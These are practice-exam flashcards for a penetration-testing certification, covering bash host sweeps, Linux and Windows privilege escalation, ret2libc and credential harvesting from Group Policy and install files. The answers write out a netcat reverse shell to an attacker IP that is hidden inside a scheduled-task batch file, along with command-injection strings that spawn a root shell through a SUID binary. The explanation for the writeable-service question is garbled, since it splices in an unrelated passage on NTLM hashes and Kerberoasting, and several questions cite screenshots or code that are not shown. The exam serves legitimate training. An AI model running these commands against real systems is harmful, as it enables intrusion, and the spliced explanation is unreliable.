Pentest+ Practice Exam Chapter 10 Attacking Local Host Vulnerabilities (Jonathan Ammerman) Flashcards
Consider the following bash one-liner command for the first six questions.
- What is the effect of the string {1..254} in this command?
A. Indicates that the numbers 1 and 254 should be fed into the command for $i
B. Indicates that all integers between 1 and 254 should be fed into the command for $i at once
C. Indicates that all integers from 1 to 254 should be iteratively fed into the command for $i
D. Indicates that every other integer starting from 1 should be fed iteratively into the command for $i, stopping once it reaches at least 254
C. Indicates that all integers from 1 to 254 should be iteratively fed into the command for $i
Explanation:
This is an example of a for loop—a command flow statement that indicates that all commands that follow should be executed repeatedly and iteratively “for” all possible values of a variable (i, in this case). The string {1..254} indicates a number sequence starting with 1 and ending at 254; for more information on this sequencing technique, search for “bash brace expansion” in your favorite search engine. A, B, and D are incorrect. A is incorrect because the {1..254} component indicates that all numbers from 1 to 254 should be fed into the command iteratively. A number sequence would be unnecessary for so few numbers; a simpler for loop setup in this case would be for i in 1 254. B is incorrect because a for loop necessarily indicates iteration; the command string will be run individually for each number in the sequence, stopping only once the sequence has been exhausted. D is incorrect because the brace expansion construct does not indicate that any number skipping should occur. A number sequence matching answer D would be {1..254..2}.
What is the effect of the string 2>&1 in this command?
A. Redirects STDOUT to a file named &1
B. Makes the ping command skip every second IP address in the numeric sequence
C. Redirects STDERR to STDOUT
D. Concatenates STDERR to STDOUT before writing to a file named &1
C. Redirects STDERR to STDOUT
Explanation:
This component redirects error messages (STDERR) to the terminal output (STDOUT). For more information on the techniques in use here, search for “bash file descriptors” and “bash redirection operators” in your favorite search engine.
A is incorrect for two reasons: file descriptor 2 refers to STDERR rather than STDOUT, and the > operator does not write output to a file when followed by an &; at that point, it is redirecting the contents of the initial file descriptor to the second file descriptor. B is incorrect because the ping sequencing is managed by the number sequence defined in the for loop. D is incorrect because, as in answer A, the “>&” operator pair redirects file descriptor flow rather than writing to a file.
What is the function of the || operator in this command sequence?
A. Indicates that the command that follows should only be run if the previous command is successful
B. Indicates that the output of the command before the operator should be directed to the following command as input
C. Indicates that the command that follows should only be run if the previous command has an exit code of 0
D. Indicates that the command that follows should only be run if the previous command does not execute successfully
D. Indicates that the command that follows should only be run if the previous command does not execute successfully
Explanation:
The || character pair is the logical OR operator. When the || operator is present, the command that follows is executed if and only if the command before it fails. For more information on the functions in play, search for “bash Boolean operators” in your favorite search engine.
A is incorrect because the behavior described matches the AND operator, designated by the character pair &&. The && operator’s presence indicates that the command that follows is executed if and only if the command preceding it is successful. B is incorrect because the behavior described matches the | operator, or pipe. C is incorrect because, as detailed in answer A, this behavior is expected when the && operator is used to connect two commands.
What is the effective result of this string of commands?
A. Pings assignable IP addresses in the 10.1.2.0/24 range with one packet, silences all output by redirecting it to /dev/null, and returns a simple message indicating whether or not the host is responding to ICMP requests
B. Pings assignable IP addresses in the 10.1.2.0/24 range for one minute, redirects all output to /dev/null, and returns two messages for each address—one saying the host is UP, the other saying the host is UNAVAILABLE
C. Pings a random IP address between 10.1.2.1 and 10.1.2.254 with one packet, silences all output by redirecting it to /dev/null, and returns a simple message indicating whether or not the host is available
D. Pings 10.1.2.1 and 10.1.2.254 for one minute each, silences all output by redirecting it to /dev/null, and returns a simple message indicating whether or not the host is available
A. Pings assignable IP addresses in the 10.1.2.0/24 range with one packet, silences all output by redirecting it to /dev/null, and returns a simple message indicating whether or not the host is responding to ICMP requests
Explanation:
The command presented will ping all assignable IP addresses from 10.1.2.1 to 10.1.2.254, silence all output, and print a simple message indicating whether or not the host is responding to ICMP requests. B, C, and D are incorrect. B is incorrect because the command sequence could not possibly print both messages for each host as written. Given that both the && and || operators rely on exit codes to determine logic flow, only one of those commands could run for any given IP address as generated by the brace expansion number sequence. C is incorrect because for loops run iteratively rather than select a random entry from the provided target list. D is incorrect because the for loop as written will necessarily address all IP addresses from 10.1.2.1 to 10.1.2.254. To only address those two IP addresses, the brace expansion component could be removed and the two IP addresses in question hardcoded in its place.
Assume that you know you are working with a /24 block of IP addresses, but you are uncertain which hosts are live. You want to minimize screen output to only print the IP addresses that are up and responding to pings. What modification could be made to this command in order to implement this change in output?
A. Delete the >/dev/null component of the sequence.
B. Delete the || echo 10.1.2.$i UNAVAILABLE component of the sequence.
C. Add | nc -nv 10.1.3.2 4444 to the end of the command sequence.
D. Add > output.txt to the end of the command sequence.
B. Delete the || echo 10.1.2.$i UNAVAILABLE component of the sequence.
Explanation:
If the majority of the IP addresses in question are suspected to be unavailable, then removing the command that only prints to the terminal if a host does not respond to ICMP requests would be the most efficient means of minimizing output.
Which of the following commands are most useful in Linux privilege escalation when attempting to identify potential OS-specific vulnerabilities for exploit? (Choose two.)
A. uname -r
B. sudo -V
C. cat /etc/*release
D. sudo -l
A. uname -r
C. cat /etc/*release
Explanation:
A will return the kernel version of a Linux host, facilitating a more focused search for kernel-level exploits. Answer C will return the specific release of a Linux host’s operating system, which can also help focus a search for an exploit path. B and D are incorrect. B is incorrect because sudo -V merely reports the version of sudo in use on a target host. Sudo is an application used to handle legitimate permission escalation, and the versions of sudo are not necessarily tied to given kernel or OS releases, making this incorrect. D is incorrect because sudo -l will only report the permissions available to a given user. Although this could potentially lead to privilege escalation through other means—writeable SUID applications, for instance, or write access to a script that runs as root—it is not going to present information that would help identify potential OS or kernel specific vulnerabilities, making it incorrect.
Which privilege escalation technique for *nix operating systems is notable for allowing attackers to control program execution on a target system without the need to write and deploy their own shellcode?
A. Ret2libc
B. NOP sled
C. Heap spraying
D. Stack smashing
A. Ret2libc
Explanation:
A ret2libc attack is a type of buffer overflow that exploits existing subroutines present in an application, making it unnecessary to write shellcode specifically for the attack. B, C, and D are incorrect. B is incorrect because a NOP sled (or NOP slide) is a technique used in buffer overflow attacks; the NOP instruction indicates that no action should be taken by a processor, effectively sliding the instruction pointer further down the stack until it reaches an instruction pair that can be acted upon. C is incorrect because heap spraying is a technique used to facilitate other exploits. It consists of sending large blocks of bytecode to the memory of a target process (its heap), attempting to get a particular byte sequence into a specific location. D is incorrect because stack smashing is a subcategory of buffer overflow that occurs when a program writes data to memory that is not allocated for the data structure in question—for example, writing 80 characters to a 60-character buffer would “overflow” that buffer allotment.
Which of the following commands are most useful in Windows privilege escalation when attempting to identify potential OS-specific vulnerabilities for exploit? (Choose two.)
A. netsh firewall show config
B. systeminfo
C. wmic qfe
D. net users
B. systeminfo
C. wmic qfe
Explanation:
The systeminfo command returns details on the OS name, version, security hotfixes, and BIOS information for a given Windows host. When wmic—the Windows Management Interface CLI—is used with the qfe flag, it will provide further details on the hotfixes present on a target Windows system. Both commands can be immensely valuable in attempting to identify OS-specific vulnerabilities for exploit on a Windows host.
During a penetration test, you collect low-level authentication credentials for a Linux server via a phishing attack. After testing and verifying these credentials, you begin searching for ways to escalate your privilege level and discover the following. What configuration vulnerability is represented in this screen capture?
A. Insecure SUID/SGID use
B. Sticky bit abuse
C. Password stored in plaintext
D. Insecure sudo access
D. Insecure sudo access
Explanation:
The sudo -l command here reveals that the user has access to all commands as the root user without the need to enter a password. This is a blatant example of insecure sudo access, although others may be worth noting. For instance, being able to run a writeable script as root without a password would also be an easy path to privilege escalation.
During a penetration test, you discover what appears to be a custom binary in a user’s home directory. What configuration vulnerability is most likely to be present in this scenario, as displayed here?
A. Sticky bit abuse
B. Insecure sudo access
C. Unquoted service path
D. Insecure SUID/SGID use
D. Insecure SUID/SGID use
Explanation:
The SUID bit is set for the owner (root) for the vulnerable_ping file. SUID binaries are always worth investigating for command injection or other vulnerabilities (especially when they run as the root user) when seeking paths for privilege escalation.
In the same directory mentioned in Question 10, you see what appears to be the .c file used to build the vulnerable executable in question. The contents of the file are shown next.
Based on the contents of this .c file, which of the following commands would likely result in privilege escalation via the compiled, root SUID binary? (Choose all that apply.)
A. ./vulnerable_ping “127.0.0.1 && /bin/dash”
B. ./vulnerable_ping “foo || sh -i”
C. ./vulnerable_ping “foo; /bin/bash”
D. ./vulnerable_ping 127.0.0.1; /bin/sh
A. ./vulnerable_ping “127.0.0.1 && /bin/dash”
B. ./vulnerable_ping “foo || sh -i”
Explanation:
A is correct because it sends a valid IP address to the ping command invoked by the application system() call, which will return with an exit code of 0. Since the command includes the AND operator (denoted by &&), the second command (/bin/dash—a lightweight shell used for init scripts in Ubuntu and other Linux distributions) will execute and provide the user with an EUID (Effective User ID) of 0, or root. B is correct because the command sends an invalid IP address (the string “foo”) to the ping command invoked by the application system() call, resulting in the command exiting with a nonzero exit code (indicating failure). Since the command string includes the OR operator (denoted by ||), the second command (sh -i) will execute, again providing the user with an EUID of 0. Note that in the case of both A and B, the argument sent to the application requires quotation marks. This treats the entire component as a single string, which is designated argv[1] by the application. Without quotation marks, whitespace would serve as a delimiter separating command-line arguments (or argvs). In the case of A and B, for example, argv[1] would be “127.0.0.1” and “foo”, respectively.
The output shown here is from a Linux application debugging and fuzzing session while searching for potential exploitable buffer overflows. Of the following choices, which is the debugging tool most likely in use?
A. OLLYDBG
B. GDB
C. WinDBG
D. Immunity Debugger
B. GDB
Explanation:
The debugger shown in the screen presented is GDB, the GNU Debugger. It is a command-line tool found on several *nix operating systems by default and supports numerous programming languages, including C, Objective-C, Fortran, and Java. While GDB does not have a native graphical interface, several have been created by third parties. In addition, numerous IDEs are able to interface with GDB directly.
Which method of attacking Windows systems exploits a weak encryption key used in Group Policy Objects to extract hardcoded user account passwords?
A. DLL hijacking
B. cpassword extraction
C. SAM database cracking
D. LSASS dumping
B. cpassword extraction
Explanation:
The cpassword attribute found in Group Policy Objects is a glaring security vulnerability due chiefly to the use of a static encryption key for all such entries as well as the open publication of the key used by Microsoft on its documentation pages. If a cpassword attribute is found in a Group Policy Object (found in the SYSVOL directory), it is as good as storing a password in plaintext.
Which method of attacking Windows family operating systems relies on remnants from the creation of a given system or server for privilege escalation?
A. Kerberoasting
B. Plaintext credential transmission via LDAP
C. Unattended installation artifact harvesting
D. cpassword extraction
C. Unattended installation artifact harvesting
Explanation:
In larger environments, it is common for administrators to automate OS creation in order to minimize the amount of busy work they have to handle manually. The issue here is that passwords can be left in documents that were a necessary part of the installation process—either in plaintext or encoded in base64.
Consider the following screenshots of a Windows privilege escalation attempt. What method of privilege escalation is being demonstrated with these changes?
A. Scheduled task abuse
B. Writeable service exploitation
C. DLL hijacking
D. Keylogging
B. Writeable service exploitation
Explanation:
This is a classic example of exploitation of a writeable service. Notice the binary path name change; instead of starting the svchost executable, a netcat reverse shell is configured to be called. Writeable services may be identified via the accesschk.exe executable, distributed with the NTLM hash of the account that owns the service. Kerberoasting tricks AD into providing a cryptographically weak ticket on which the attacker can then run a cracking attempt to obtain the account password.
Consider the following scheduled task in a Windows environment for which you have low-privilege access. Upon investigation, you find that the .bat file referenced can be modified by anyone and contains the following commands:
cd “C:\Program Files\Rails_Server”
C:\tools\ruby23\bin\rails.bat server
You have already managed to smuggle a copy of nc.exe onto the target system at C:\Users\user\Desktop. Assuming your attacking IP is 10.1.2.2 and you have a netcat listener set up on port 80, which of the following actions would be the least invasive method to effect reliable privilege escalation?
A. Append “& C:\Users\user\Desktop\nc.exe -nv 10.1.2.2 80 -e C:\Windows\System32\cmd.exe” to the end of the line
B. Append “&& @start C:\Users\user\Desktop\nc.exe -nv 10.1.2.2 80 -e C:\Windows\System32\cmd.exe” to the end of the line
C. Overwrite the file contents with “C:\Users\user\Desktop\nc.exe -nv 10.1.2.2 80 -e C:\Windows\System32\cmd.exe”
D. Insert “@start /b C:\Users\user\Desktop\nc.exe -nv 10.1.2.2 80 -e C:\Windows\System32\cmd.exe &” into the command sequence, between the directory change and the rails.bat call
D. Insert “@start /b C:\Users\user\Desktop\nc.exe -nv 10.1.2.2 80 -e C:\Windows\System32\cmd.exe &” into the command sequence, between the directory change and the rails.bat call
Explanation:
Notice that the question referred to the least invasive method: by using the @start command directive, the netcat component of this batch file will run asynchronously in a separate command process, allowing the user-defined rails.bat call to continue to run. This will effectively ensure that the reverse shell calls home, while the legitimate user sees their rails server running, making them more likely to believe that all is well with their scheduled task.